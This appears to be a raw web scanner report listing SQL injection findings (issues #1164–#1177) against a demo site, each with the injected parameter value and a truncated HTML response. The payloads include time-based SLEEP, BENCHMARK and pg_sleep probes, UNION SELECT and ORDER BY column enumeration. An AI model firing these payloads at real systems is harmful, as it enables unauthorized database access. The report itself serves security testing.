href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1164\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1165\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ;\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1166\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1167\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# ' o/**/r 1/0 --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1168\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nSensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryAlerts hints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1169\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1170\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1171\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1172Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 22\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1173\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 24#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1174\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \")) or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1175\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1176\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \\\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1177\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: 